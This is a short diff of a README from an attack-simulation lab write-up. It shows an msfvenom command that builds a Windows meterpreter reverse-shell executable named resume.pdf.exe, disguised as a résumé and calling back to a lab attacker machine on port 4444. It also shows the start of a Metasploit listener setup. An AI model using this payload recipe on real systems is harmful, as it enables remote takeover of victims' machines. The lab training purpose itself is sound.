bagaskarapd/Attack-Simulation/README.md

 <pre>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.100 LPORT=4444 -f exe -o resume.pdf.exe</pre>

-<p>This executable simulates a trojanized document that, once opened, connects back to the Kali Linux attacker machine.
-I then set up a listener in Metasploit to catch the reverse shell:</p>
+<p>This creates an executable file named resume.pdf.exe that, when executed, will attempt to connect back to the Kali Linux machine on port 4444.</p>

+<p>I then set up a listener in Metasploit to catch the reverse shell:</p>
 <pre>
 msfconsole
 use exploit/multi/handler